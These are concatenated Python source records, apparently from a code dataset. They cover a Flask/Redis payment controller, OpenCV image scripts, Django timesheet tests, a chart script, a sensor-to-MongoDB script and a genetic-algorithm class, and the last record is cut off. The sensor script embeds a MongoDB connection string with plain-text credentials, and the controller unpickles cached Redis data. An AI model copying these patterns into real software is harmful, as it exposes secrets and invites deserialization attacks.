ShippingInformation\nfrom inf5190.model.creditCardModel import CreditCard\nfrom inf5190.model.transactionModel import Transaction\nfrom inf5190.view import views\n\nredis_url = os.environ.get('REDIS_URL', 'redis://localhost')\nredis_conn = Redis.from_url(redis_url)\nqueue = Queue(connection=redis_conn)\n\n\nclass OrderController:\n @classmethod\n def formatted_order(cls, order_id):\n cle = f\"order-{order_id}\"\n order_cached = redis_conn.get(cle)\n if order_cached:\n order_json = pickle.loads(order_cached)\n else:\n order_json = get_order_products(order_id)\n \n return views.display_order(order_json)\n \n @classmethod\n def create_order(cls, post_data):\n if \"product\" in post_data and \"id\" in post_data[\"product\"] and \"quantity\" in post_data[\"product\"] \\\n and isinstance(post_data[\"product\"][\"id\"], int) and isinstance(post_data[\"product\"][\"quantity\"], int) \\\n and post_data[\"product\"][\"quantity\"] > 0:\n \n product_id = post_data[\"product\"][\"id\"]\n quantity = post_data[\"product\"][\"quantity\"]\n product = Product.get_or_none(Product.id == product_id)\n \n if not product or not product.in_stock:\n return views.display_error_out_of_inventory()\n \n price = product.price\n weight = product.weight\n total_price = price * quantity\n if weight < 500.0:\n shipping_price = 5\n elif weight < 2000.0:\n shipping_price = 10\n else:\n shipping_price = 25\n \n order = Order.create(total_price=total_price, shipping_price=shipping_price, paid=False, in_progress=False)\n ProductOrder.create(product_id=product_id, order_id=order.id, 
quantity=quantity)\n \n return views.display_post_redirect(order.id)\n \n elif \"products\" in post_data:\n total_price = 0\n shipping_price = 0\n product_list_id = []\n \n for product_item in post_data[\"products\"]:\n if \"id\" in product_item and \"quantity\" in product_item and isinstance(product_item[\"id\"], int) \\\n and isinstance(product_item[\"quantity\"], int) and product_item[\"quantity\"] > 0:\n \n product_id = product_item[\"id\"]\n quantity = product_item[\"quantity\"]\n product = Product.get_or_none(Product.id == product_id)\n \n if not product or not product.in_stock:\n return views.display_error_out_of_inventory()\n \n price = product.price\n weight = product.weight\n total_price += price * quantity\n if weight < 500.0:\n shipping_price += 5\n elif weight < 2000.0:\n shipping_price += 10\n else:\n shipping_price += 25\n \n p_id = ProductOrder.create(product_id=product_id, quantity=quantity)\n product_list_id.append(p_id)\n \n else:\n return views.display_error_missing_fields_product()\n \n order = Order.create(total_price=total_price, shipping_price=shipping_price, paid=False, in_progress=False)\n for product_item_id in product_list_id:\n ProductOrder.update(order=order.id).where(ProductOrder.id == product_item_id).execute()\n \n return views.display_post_redirect(order.id)\n \n else:\n return views.display_error_missing_fields_product()\n \n @classmethod\n def update_order(cls, post_data, order_id):\n order = Order.get_or_none(Order.id == order_id)\n if not order.in_progress:\n if \"credit_card\" in post_data:\n return cls.update_credit_card(post_data, order_id)\n else:\n return cls.update_shipping_info(post_data, order_id)\n else:\n return views.display_order_standby_conflict()\n \n @staticmethod\n def update_shipping_info(post_data, order_id):\n if \"order\" in post_data and \"email\" in post_data[\"order\"] and \"shipping_information\" in post_data[\"order\"] \\\n and \"country\" in post_data[\"order\"][\"shipping_information\"] \\\n and \"address\" in post_data[\"order\"][\"shipping_information\"] \\\n and \"postal_code\" in post_data[\"order\"][\"shipping_information\"] \\\n and \"city\" in post_data[\"order\"][\"shipping_information\"] \\\n and \"province\" in post_data[\"order\"][\"shipping_information\"]:\n \n email = post_data[\"order\"][\"email\"]\n country = post_data[\"order\"][\"shipping_information\"][\"country\"]\n address = post_data[\"order\"][\"shipping_information\"][\"address\"]\n postal_code = post_data[\"order\"][\"shipping_information\"][\"postal_code\"]\n city = post_data[\"order\"][\"shipping_information\"][\"city\"]\n province = post_data[\"order\"][\"shipping_information\"][\"province\"]\n shipping_information = ShippingInformation.create(country=country, address=address,\n postal_code=postal_code,\n city=city, province=province)\n Order.update(email=email,\n shipping_information=shipping_information.id).where(Order.id == order_id).execute()\n return views.display_ok()\n \n else:\n return views.display_error_missing_fields_order()\n \n @staticmethod\n def update_credit_card(post_data, order_id):\n order = Order.get_or_none(Order.id == order_id)\n \n if not order.shipping_information:\n return views.display_error_missing_shipping_info()\n \n if \"credit_card\" in post_data and \"name\" in post_data[\"credit_card\"] and \"number\" in post_data[\"credit_card\"] \\\n and \"expiration_year\" in post_data[\"credit_card\"] and \"cvv\" in post_data[\"credit_card\"] \\\n and \"expiration_month\" in post_data[\"credit_card\"]:\n \n if order.paid:\n 
return views.display_error_already_paid()\n \n name = post_data[\"credit_card\"][\"name\"]\n number = post_data[\"credit_card\"][\"number\"]\n expiration_month = post_data[\"credit_card\"][\"expiration_month\"]\n expiration_year = post_data[\"credit_card\"][\"expiration_year\"]\n cvv = post_data[\"credit_card\"][\"cvv\"]\n \n payment_data = {\n \"credit_card\": {\n \"name\": name,\n \"number\": number,\n \"expiration_year\": expiration_year,\n \"cvv\": cvv,\n \"expiration_month\": expiration_month\n },\n \"amount_charged\": order.total_price + order.shipping_price\n }\n\n Order.update(in_progress=True).where(Order.id == order_id).execute()\n queue.enqueue(pay_order, order_id, payment_data)\n return views.display_order_standby()\n \n else:\n return views.display_error_missing_fields_order()\n\n\ndef get_order_products(order_id):\n order = Order.get_or_none(Order.id == order_id)\n product_list = []\n query = ProductOrder.select().join(Order).where(ProductOrder.order_id == order_id).execute()\n for product_order in query:\n product = {\"id\": product_order.product_id, \"quantity\": product_order.quantity}\n product_list.append(product)\n return views.get_order_json(order, product_list)\n\n\ndef pay_order(order_id, payment_data):\n try:\n payment_response = perform_request(uri=\"pay\", method=\"POST\", data=payment_data)\n credit_card = CreditCard.create(name=payment_response[\"credit_card\"][\"name\"],\n first_digits=payment_response[\"credit_card\"][\"first_digits\"],\n last_digits=payment_response[\"credit_card\"][\"last_digits\"],\n expiration_year=payment_response[\"credit_card\"][\"expiration_year\"],\n expiration_month=payment_response[\"credit_card\"][\"expiration_month\"])\n transaction = Transaction.create(code=payment_response[\"transaction\"][\"id\"],\n success=payment_response[\"transaction\"][\"success\"],\n amount_charged=payment_response[\"transaction\"][\"amount_charged\"])\n Order.update(credit_card=credit_card.id,\n transaction=transaction.id, paid=True, in_progress=False).where(Order.id == order_id).execute()\n\n order_json = get_order_products(order_id)\n redis_conn.set(f\"order-{order_id}\", pickle.dumps(order_json), ex=86400)\n \n except ApiError as error:\n transaction = Transaction.create(success=False,\n amount_charged=payment_data[\"amount_charged\"],\n error_code=error.code, error_name=error.name)\n Order.update(transaction=transaction.id, paid=False, in_progress=False).where(Order.id == order_id).execute()\n\n\n@click.command(\"worker\")\n@with_appcontext\ndef rq_worker():\n worker = Worker([queue], connection=redis_conn)\n worker.work()\n","sub_path":"inf5190/controller/orderController.py","file_name":"orderController.py","file_ext":"py","file_size_in_byte":10009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"358481026","text":"import numpy as np\nimport imutils\nimport cv2\nimport glob\n\nimages = [cv2.imread(file,0) for file in glob.glob(\"out/*.png\")]\n\n#img = cv2.imread(\"out5.png\",0)\ncounter = 0\nfor img in images:\n\theight, width = img.shape[:2]\n\tres = cv2.resize(img,(3*width, 3*height), interpolation= cv2.INTER_LINEAR )\n\n\tkernel = np.ones((2,2),np.float32)\n\tret,thresh1 = cv2.threshold(res,100,255,cv2.THRESH_BINARY)\n\timg = cv2.bitwise_not(thresh1)\n\tclosing = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)\n\n\tnama = 'hasil%d' % (counter)\n\tcounter += 1\n\tcv2.imwrite(\"out/ktp/transform/\"+nama+\".png\",closing)\n\tcv2.imshow(\"th3\", 
closing)\n\tcv2.waitKey(0)","sub_path":"support/cropping_data/transform_nik_nama.py","file_name":"transform_nik_nama.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"395622448","text":"#\n# QuarterApp - A time tracker for common people.\n#\n# Copyright 2015-2018 The QuarterApp Team\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport datetime\n\nfrom django.core.validators import EMPTY_VALUES\nfrom django.db import IntegrityError\nfrom django.test import TestCase\nfrom django.utils.encoding import force_text\n\nfrom . import factories\nfrom ..models import Timesheet, OffsetError, Quarter\nfrom ...accounts.tests import factories as account_factories\nfrom ...accounts.tests.test_mixins import CreateTestUserMixin\nfrom ...core.tests import factories as core_factories\n\n\ndef datetime_from_now(days=0):\n now = datetime.datetime.now()\n return now + datetime.timedelta(days=days)\n\n\ndef date_from_now(days=0):\n return datetime_from_now(days=days).date()\n\n\nclass TimesheetTests(CreateTestUserMixin, TestCase):\n def setUp(self):\n super(TimesheetTests, self).setUp()\n self.project = core_factories.create_project(self.user)\n self.activity = core_factories.create_activity(self.project)\n self.activity2 = core_factories.create_activity(self.project)\n self.project2 = core_factories.create_project(self.user)\n self.activity3 = core_factories.create_activity(self.project2)\n self.timesheet = factories.create_timesheet(self.user)\n\n def test_create_duplicate_timesheets(self):\n self.assertRaises(\n IntegrityError, factories.create_timesheet, user=self.user)\n\n def test_owner_and_user(self):\n self.assertEqual(self.user.owner_object, self.timesheet.owner)\n self.assertEqual(self.user, self.timesheet.user)\n\n def test_multiple_timesheets(self):\n days = [1, 2, 3, 4, 5, 6, 7]\n result = [self.timesheet]\n for day_delta in days:\n date = date_from_now(days=day_delta)\n result.append(factories.create_timesheet(self.user, date=date))\n\n timesheets = Timesheet.objects.all()\n self.assertSequenceEqual(timesheets, result)\n\n def test_timesheet_should_have_zero_hours(self):\n ts = Timesheet()\n self.assertEqual(0, ts.total_hours)\n\n def test_registration_require_activity(self):\n with self.assertRaises(ValueError):\n self.timesheet.register(offset=0, count=12, activity=None)\n\n def test_timesheet_can_register_time(self):\n self.timesheet.register(offset=0, count=12, activity=self.activity)\n self.assertEqual(3, self.timesheet.total_hours)\n\n def test_timesheet_cannot_register_negative_offset(self):\n ts = Timesheet()\n with self.assertRaises(OffsetError):\n ts.register(offset=-12, count=12, activity=self.activity)\n\n def test_timesheet_cannot_register_more_than_96_quarters(self):\n ts = Timesheet()\n with self.assertRaises(OffsetError):\n ts.register(offset=97, count=12, activity=self.activity)\n\n def test_timesheet_cannot_go_out_of_bounds(self):\n self.timesheet.register(offset=90, count=6, 
activity=self.activity)\n with self.assertRaises(OffsetError):\n self.timesheet.register(offset=90, count=17,\n activity=self.activity)\n\n def test_timesheet_can_be_reset(self):\n self.timesheet.register(offset=0, count=12, activity=self.activity)\n self.timesheet.reset()\n\n self.assertEqual(0, self.timesheet.total_hours)\n\n def test_multiple_activities_can_be_registered(self):\n self.timesheet.register(offset=0, count=12, activity=self.activity)\n self.timesheet.register(offset=20, count=16, activity=self.activity2)\n\n self.assertEqual(7, self.timesheet.total_hours)\n\n def test_timesheet_user_cannot_register_others_activities(self):\n # TODO\n pass\n\n def test_registrations_can_be_overwritten(self):\n self.timesheet.register(offset=0, count=12, activity=self.activity)\n self.timesheet.register(offset=4, count=16, activity=self.activity2)\n\n self.assertEqual(5, self.timesheet.total_hours)\n\n def test_timesheet_usage_is_empty_by_default(self):\n self.assertIsNotNone(self.timesheet.usage)\n self.assertEqual(0, self.timesheet.usage.total)\n\n def test_usage_for_single_activity(self):\n self.timesheet.register(offset=0, count=12, activity=self.activity)\n self.assertEqual(3.0, self.timesheet.usage.total)\n\n def test_timesheet_summary_contains_single_project(self):\n self.timesheet.register(offset=0, count=12, activity=self.activity)\n self.assertEqual(1, len(self.timesheet.usage.projects))\n\n def test_project_usage_is_sorted_on_total(self):\n self.timesheet.register(offset=0, count=12, activity=self.activity)\n self.timesheet.register(offset=22, count=16, activity=self.activity2)\n self.timesheet.register(offset=40, count=40, activity=self.activity3)\n\n self.assertEqual(10.0, self.timesheet.usage.projects[0].total)\n self.assertEqual(\n self.project2, self.timesheet.usage.projects[0].project)\n self.assertEqual(\n 7.0, self.timesheet.usage.projects[1].total)\n self.assertEqual(\n self.project, self.timesheet.usage.projects[1].project)\n\n def test_usage_filters_on_owner(self):\n other_user = account_factories.create_standard_user(\n username=account_factories.random_string(),\n password=account_factories.random_string())\n other_project = core_factories.create_project(other_user)\n other_activity = core_factories.create_activity(other_project)\n\n other_ts = factories.create_timesheet(\n other_user, state=Timesheet.STATE_OPEN, date=date_from_now(0))\n\n self.timesheet.register(offset=0, count=8, activity=self.activity)\n other_ts.register(offset=0, count=16, activity=other_activity)\n\n self.assertEqual(2.0, self.timesheet.usage.total)\n self.assertEqual(1, len(self.timesheet.usage.projects))\n self.assertEqual(4.0, other_ts.usage.total)\n self.assertEqual(1, len(other_ts.usage.projects))\n\n def test_all_quarters(self):\n self.timesheet.register(offset=0, count=48, activity=self.activity)\n quarters = self.timesheet.all_quarters\n empty_activity = Timesheet.create_empty_activity()\n empty_quarters = [True for quarter in quarters if quarter.activity ==\n empty_activity]\n filled_quarters = [True for quarter in quarters if quarter.activity !=\n empty_activity]\n\n self.assertEqual(len(empty_quarters), 48)\n self.assertEqual(len(filled_quarters), 48)\n\n def test_fake_quarters(self):\n fake_quarters = self.timesheet.fake_quarters\n self.assertIsInstance(fake_quarters[0], Quarter)\n self.assertEquals(len(fake_quarters), 96)\n\n def test_repr(self):\n self.assertNotIn(force_text(self.timesheet), EMPTY_VALUES)\n\n\nclass TimesheetManagerTests(CreateTestUserMixin, TestCase):\n def 
setUp(self):\n        super(TimesheetManagerTests, self).setUp()\n        self.timesheet = factories.create_timesheet(self.user)\n\n    def test_my_timesheets(self):\n        user2 = account_factories.create_standard_user()\n        timesheet2 = factories.create_timesheet(user2)\n\n        timesheets = Timesheet.objects.my_timesheets(self.user)\n\n        self.assertIn(self.timesheet, timesheets)\n        self.assertNotIn(timesheet2, timesheets)\n\n\nclass TimesheetStateTests(CreateTestUserMixin, TestCase):\n    def test_open_to_submitted(self):\n        timesheet = factories.create_timesheet(\n            self.user, state=Timesheet.STATE_OPEN,\n            date=date_from_now(0))\n        self.assertTrue(timesheet.is_open)\n\n        timesheet.set_state_submitted()\n        self.assertTrue(Timesheet.objects.get(pk=timesheet.pk).is_submitted)\n\n    def test_submitted_to_rejected(self):\n        timesheet = factories.create_timesheet(\n            self.user, state=Timesheet.STATE_SUBMITTED,\n            date=date_from_now(0))\n        self.assertTrue(timesheet.is_submitted)\n\n        timesheet.set_state_rejected()\n        self.assertTrue(Timesheet.objects.get(pk=timesheet.pk).is_rejected)\n\n    def test_rejected_to_approved(self):\n        timesheet = factories.create_timesheet(\n            self.user, state=Timesheet.STATE_REJECTED,\n            date=date_from_now(0))\n        self.assertTrue(timesheet.is_rejected)\n\n        timesheet.set_state_approved()\n        self.assertTrue(Timesheet.objects.get(pk=timesheet.pk).is_approved)\n\n    def test_approved_to_open(self):\n        timesheet = factories.create_timesheet(\n            self.user, state=Timesheet.STATE_APPROVED,\n            date=date_from_now(0))\n        self.assertTrue(timesheet.is_approved)\n\n        timesheet.set_state_open()\n        self.assertTrue(Timesheet.objects.get(pk=timesheet.pk).is_open)\n\n\nclass QuartersTests(CreateTestUserMixin, TestCase):\n    def setUp(self):\n        super(QuartersTests, self).setUp()\n        self.project = core_factories.create_project(self.user)\n        self.activity = core_factories.create_activity(self.project)\n        self.timesheet = factories.create_timesheet(self.user)\n\n    def test_create_duplicate_quarters(self):\n        factories.create_quarter(self.timesheet, self.activity, 0)\n        with self.assertRaises(IntegrityError):\n            factories.create_quarter(self.timesheet, self.activity, 0)\n\n    def test_out_of_bounds_offset(self):\n        with self.assertRaises(IntegrityError):\n            factories.create_quarter(self.timesheet, self.activity, -1)\n        with self.assertRaises(IntegrityError):\n            factories.create_quarter(self.timesheet, self.activity, 97)\n\n    def test_full_timesheet(self):\n        for offset in range(0, 96):\n            factories.create_quarter(self.timesheet, self.activity, offset)\n        self.assertEqual(96, self.timesheet.quarters.count())\n\n    def test_repr(self):\n        quarter = factories.create_quarter(self.timesheet, self.activity, 0)\n        self.assertNotIn(force_text(quarter), EMPTY_VALUES)\n","sub_path":"quarterapp/quarterapp/timesheet/tests/test_timesheet.py","file_name":"test_timesheet.py","file_ext":"py","file_size_in_byte":10490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"194377107","text":"import cv2\nimport numpy as np\nimport imutils\nfrom imutils import contours\n\nimage = cv2.imread(\"commercial_invoice.jpg\")\norig = image.copy()\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n# edged = imutils.auto_canny(gray)\nbinary = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\n# cv2.imshow('binary', binary)\nheight, width = binary.shape\n# extract all horizontal lines (long, 1-pixel-tall kernel)\nk1 = cv2.getStructuringElement(cv2.MORPH_RECT, (width // 30, 1))\nheroded = cv2.erode(binary, k1, iterations=1)\nhdilated = cv2.dilate(heroded, k1, iterations=1)\n# cv2.imshow('hdilated', hdilated)\n# hdilated_inv = cv2.bitwise_not(hdilated)\n# cv2.imshow('hdilated_inv', hdilated_inv)\n# extract all vertical lines (1-pixel-wide, tall kernel)\nk2 = cv2.getStructuringElement(cv2.MORPH_RECT, (1, height // 30))\nveroded = cv2.erode(binary, k2, iterations=1)\nvdilated = cv2.dilate(veroded, k2, iterations=1)\n# cv2.imshow('vdilated', vdilated)\n# vdilated_inv = cv2.bitwise_not(vdilated)\n# cv2.imshow('vdilated', vdilated_inv)\n# merge the vertical and horizontal lines\nor_dilated = cv2.bitwise_or(vdilated, hdilated)\nedged = imutils.auto_canny(or_dilated)\n# find contours in the edge map using OpenCV 3\n(_, cnts, _) = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL,\n                                cv2.CHAIN_APPROX_SIMPLE)\ncv2.imwrite('edged.jpg', edged)\n# contour_sizes = [(cv2.contourArea(contour), contour) for contour in cnts]\n# print(contour_sizes)\n\ncnts = sorted(cnts, key=lambda c: cv2.contourArea(c), reverse=True)\nordered_contour_sizes = [(cv2.contourArea(contour), contour) for contour in cnts]\nprint(ordered_contour_sizes)\nimg = cv2.drawContours(image, [cnts[0]], -1, (0, 255, 0), 1) # mark the contour with index 0\nfor i in range(4):\n    (x, y, w, h) = cv2.boundingRect(cnts[i])\n    img = cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)\ncv2.imshow('max', img)\ncv2.waitKey(0)\n\n# loop over the (unsorted) contours and label them\nfor (i, c) in enumerate(cnts):\n    orig = contours.label_contour(orig, c, i, color=(240, 0, 159))\n\n# show the original image\ncv2.imshow(\"Original\", orig)\n\n# loop over the sorting methods\nfor method in (\"left-to-right\", \"right-to-left\", \"top-to-bottom\", \"bottom-to-top\"):\n    # sort the contours\n    (cnts, boundingBoxes) = contours.sort_contours(cnts, method=method)\n    clone = image.copy()\n\n    # loop over the sorted contours and label them\n    for (i, c) in enumerate(cnts):\n        sortedImage = contours.label_contour(clone, c, i, color=(240, 0, 159))\n\n    # show the sorted contour image\n    cv2.imshow(method, sortedImage)\n\n# wait for a keypress\ncv2.waitKey(0)\n","sub_path":"commercial_invoice/invoce3.py","file_name":"invoce3.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"399147015","text":"\"\"\"\nOpdracht 18 - Experimentele verjaardagsparadox (Assignment 18 - Experimental birthday paradox)\nhttps://dodona.ugent.be/nl/exercises/1257408557/\n\"\"\"\n\nimport random\n\ndef checkDuplicates(duplicates):\n    return len(duplicates) != len(set(duplicates))\n\n\ndef happenTogether(m: int, n: int):\n    duplicates = []\n\n    for i in range(0, n):\n        duplicates.append(random.randint(1, m))\n\n    return checkDuplicates(duplicates)\n\n\ndef estimateChance(m: int, n: int, tests: int):\n    teller = 0\n\n    for i in range(0, tests):\n        if happenTogether(m, n) == True:\n            teller = teller + 1\n\n    return (teller / tests)\n\n\ndef main():\n    print(happenTogether(6, 3))\n    print(happenTogether(6, 3))\n\n    print(estimateChance(6, 2, 10000))\n    print(estimateChance(365, 23, 10000))\n\nif __name__ == '__main__':\n    main()","sub_path":"week04/Experimentele verjaardagsparadox.py","file_name":"Experimentele verjaardagsparadox.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"92089182","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 3 11:51:57 2019\n\n@author: DELL-1\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport collections as cl\n\nmatplotlib.rcParams['font.sans-serif'] = ['SimHei'] \nmatplotlib.rcParams['font.family']='sans-serif'\nmatplotlib.rcParams['axes.unicode_minus'] = False\n\ndef 
experience_command(get_all_data):\n#get_all_data = get_all_data[\"experience\"].value_counts()\\\n    get_all_data = cl.Counter(get_all_data['experience'])\n\n\n    experience = ['经验不限',\n                  '经验应届毕业生',\n                  '经验1年以下',\n                  '经验1-3年',\n                  '经验3-5年',\n                  '经验5-10年',\n                  '经验10年以上']\n    value = []\n    for i in range(len(experience)):\n        value.append(get_all_data[experience[i]])\n\n    colors = ['yellow','yellowgreen','lightskyblue','springgreen','cyan','peachpuff','seashell']\n\n    plt.figure(figsize=(10,10))\n    plt.axes(aspect = 1)\n    wedges, texts, autotexts = plt.pie(x = value,\n                                       autopct = \"%.2f%%\",\n                                       colors = colors,\n                                       shadow = True)\n    plt.legend(wedges,\n               experience,\n               fontsize = 12,\n               title='经验情况分布',\n               loc = 'center left',\n               bbox_to_anchor = (1,0,0.15,1.7)\n               )\n    plt.title('经验需求')\n    plt.savefig('C:/WeSite/DataCharts/岗位概况/相关要求/工作经验要求分布饼状图-100dpi.jpg',dpi=100,bbox_inches = 'tight')\n    plt.show()\n","sub_path":"数据可视化/experience_command.py","file_name":"experience_command.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"237667024","text":"import Adafruit_DHT\nfrom pymongo import MongoClient\nclient=MongoClient(\"mongodb+srv://test:test@cluster0.glewd.mongodb.net/\")\ndb=client.get_database('demo_db')\nrecord=db.sensor_data\nDHT_SENSOR=Adafruit_DHT.DHT11\nDHT_PIN=4\nwhile True:\n\thum,temp=Adafruit_DHT.read(DHT_SENSOR,DHT_PIN)\n\tif temp:\n\t\trecord.update_one({'userId':'Tarun'},{'$set':{'temp':temp}})\n\t\trecord.update_one({'userId':'Tarun'},{'$set':{'humidity':hum}})\n\t\tprint(hum,temp)\n","sub_path":"Raspberry_Pi/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"142004512","text":"import random\nfrom .genome import Genome, GenomePlayer, Game\nimport sys\n\n\nclass Evolutore:\n    def __init__(self, genometype: Genome.__class__, genomeplayertype: GenomePlayer.__class__,\n                 gametype: Game.__class__, individuals=150,\n                 mutate_prob=0.002, crossover_prob=0.004,\n                 elim_n=20, elitism=3, shared_sampling=30, hof=10):\n        \"\"\"\n\n        :type genometype: Genome.__class__\n        :type genomeplayertype: GenomePlayer.__class__\n        :type gametype: Game.__class__\n\n        \"\"\"\n        random.seed()\n        # types\n        self.genometype = genometype\n        self.genomeplayertype = genomeplayertype\n        self.gametype = gametype\n        # parameters\n        self.mutate_prob = mutate_prob\n        self.crossover_prob = crossover_prob\n        self.elim_n = elim_n\n        self.elitism = elitism\n        self.shared_sampling = shared_sampling\n        self.hof = hof\n        # other\n        self.individuals = individuals\n        self.populations = [Population(genometype), Population(genometype)]\n        self.last_results = [[], []]\n        self.halls_of_fame = [[], []]\n        self.generation = 0\n\n    def evolve(self, generations):\n        self._generate_populations()\n        for i in range(generations):\n            print(\"GENERATION: %d\" % i)\n            self._play_generation()\n        print(\"EVOLUTION FINISHED\")\n        return self.halls_of_fame[0][-1]\n\n    def _generate_populations(self):\n        \"\"\"\n        Creates a random population and assigns an id to every individual.\n        \"\"\"\n        for j in range(2):\n            self.populations[j].generate_new(self.individuals)\n\n    def _play_generation(self):\n        self.hall_of_fame = self.halls_of_fame[0]\n        self._play_tournament()\n        self._calculate_cfs()\n        self._update_hall_of_fame()\n        self._generate_new_population()\n        self.populations[0], self.populations[1] = self.populations[1], self.populations[0]\n\n        self.hall_of_fame = self.halls_of_fame[1]\n        self._play_tournament()\n        self._calculate_cfs()\n        self._update_hall_of_fame()\n        self._generate_new_population()\n        self.populations[0], self.populations[1] = self.populations[1], self.populations[0]\n\n        self.generation += 1\n\n    def _play_tournament(self):\n        \"\"\"\n        Runs a tournament between population 0 and a sample of population 1.\n        \"\"\"\n        sample = self._get_shared_sampling()\n        hall_of_fame = self._get_hall_of_fame()\n        sample.extend(hall_of_fame)\n        coppie = [(x, y) for x in self.populations[0].individuals for y in sample]\n\n        points = 50\n        i = 0\n        step = int(len(coppie) / points)\n        print(\"Generating [\", end=\"\")\n        print(\".\" * points, end=\"\")\n        print(\"]\", end=\"\")\n        print(\"\\b\" * points, end=\"\")\n\n        for coppia in coppie:\n            g0 = self.genomeplayertype(coppia[0])\n            g1 = self.genomeplayertype(coppia[1])\n            game = self.gametype()\n            winner = game.play(g0, g1)\n\n            if not hasattr(coppia[0], \"_beat\"):\n                coppia[0]._beat = []\n            if not hasattr(coppia[1], \"_beaten\"):\n                coppia[1]._beaten = 0\n\n            if winner == 0:\n                coppia[0]._beat.append(coppia[1])\n                coppia[1]._beaten += 1\n\n            if i % step == 0:\n                print(\"\\b=>\", end=\"\")\n                sys.stdout.flush()\n            i += 1\n        print(\"\\b]\", end=\"\")\n        print(\" Done\")\n\n    def _calculate_cfs(self):\n        \"\"\"\n        Computes the cfs of every individual.\n        \"\"\"\n        print(\"COMPUTING CFS\")\n        for individuo in self.populations[0].individuals:\n            individuo._cfs = 0\n            for battuto in individuo._beat:\n                individuo._cfs += 1 / battuto._beaten\n        print(\"DONE\")\n\n    def _get_shared_sampling(self):\n        \"\"\"\n        Creates a sample using shared sampling.\n        :return: A sample of genomes\n        \"\"\"\n        print(\"COMPUTING SHARED SAMPLING\")\n        if self.generation == 0:\n            sample = self._get_random_sample(self.populations[1].individuals, self.shared_sampling)\n        else:\n            sample = []\n            beaten = {}\n\n            for i in range(self.shared_sampling):\n                samp_fit = {}\n                for genome in self.populations[1].individuals:\n                    if not hasattr(genome, \"_beat\") or genome in sample:\n                        continue\n                    samp_fit[genome] = 0\n                    for loser in genome._beat:\n                        if beaten.get(loser) is None:\n                            beaten[loser] = 0\n                        samp_fit[genome] += 1/(1+beaten[loser])\n                winner = max(samp_fit.items(), key=(lambda x: x[1]))[0]\n                sample.append(winner)\n                for loser in winner._beat:\n                    beaten[loser] += 1\n        print(\"SHARED SAMPLING DONE\")\n        for genome in self.populations[1].individuals:\n            genome._beat = []\n            genome._beaten = 0\n        return sample\n\n    @staticmethod\n    def _get_random_sample(l, n):\n        \"\"\"\n        Takes a random sample from the given list.\n        :param l: List to sample from\n        :param n: Number of elements in the sample\n        :return: A random sample\n        \"\"\"\n        b = [x for x in range(len(l))]\n        sample = []\n        for i in range(n):\n            try: # If there are not enough elements, take them all\n                sample.append(l[b.pop(random.randint(0, len(b) - 1))])\n            except Exception:\n                pass\n        return sample\n\n    def _get_hall_of_fame(self):\n        \"\"\"\n        :return: A list of elements taken at random from the hall of fame\n        \"\"\"\n        return self._get_random_sample(self.hall_of_fame, self.hof)\n\n    def _update_hall_of_fame(self):\n        \"\"\"\n        Adds the best element to the Hall of Fame.\n        \"\"\"\n        self.hall_of_fame.append(max(self.populations[0].individuals, key=(lambda x: x._cfs)))\n\n    def _generate_new_population(self):\n        \"\"\"\n        Generates a new population by removing and recreating individuals.\n\n        :return: A new generation\n        \"\"\"\n        elite = self._select_elite()\n        self._remove_worst()\n        coppie = self._make_couple_mating()\n        self._crossover(coppie)\n        self._mutate(elite)\n\n    def _select_elite(self):\n        \"\"\"\n        Generates a list with the elite.\n\n        :return: A list with the elite\n        \"\"\"\n        elite = []\n        for i in range(self.elitism):\n            elite.append(max(self.populations[0].individuals, key=(lambda x: x._cfs if x not in elite else 0)))\n        return elite\n\n    def _make_couple_mating(self):\n        \"\"\"\n        Creates the couples used to recreate the population.\n\n        :return: A list of genome couples\n        \"\"\"\n\n        coppie = []\n        for i in range(self.elim_n):\n            likelihood = {}\n            for genome in self.populations[0].individuals:\n                likelihood[genome] = genome._cfs*random.random()\n            coppia = [max(likelihood.items(), key=(lambda x: x[1]))[0]]\n            coppia.append(max(likelihood.items(), key=(lambda x: x[1] if x[0] not in coppia else 0))[0])\n            coppie.append(coppia)\n        return coppie\n\n    def _crossover(self, coppie):\n        \"\"\"\n        Adds the children of the selected individuals to the population.\n\n        :param coppie: The genome couples to combine\n        \"\"\"\n        print(\"STARTING CROSSOVER OF %d COUPLES\" % len(coppie))\n        figli = []\n        for coppia in coppie:\n            figlio = coppia[0].crossover(coppia[1], self.crossover_prob)\n            figli.append(figlio)\n        self.populations[0].individuals.extend(figli)\n        print(\"CROSSOVER DONE\")\n\n    def _mutate(self, elite):\n        \"\"\"\n        Mutates the population elements that are not in the elite.\n        :param elite: A list of individuals in the elite\n        \"\"\"\n        print(\"STARTING MUTATION\")\n        for genoma in self.populations[0].individuals:\n            if genoma not in elite:\n                genoma.mutate(self.mutate_prob)\n        print(\"MUTATION DONE\")\n\n    def _remove_worst(self):\n        \"\"\"\n        Removes the worst individuals by fitness.\n        \"\"\"\n        for i in range(self.elim_n):\n            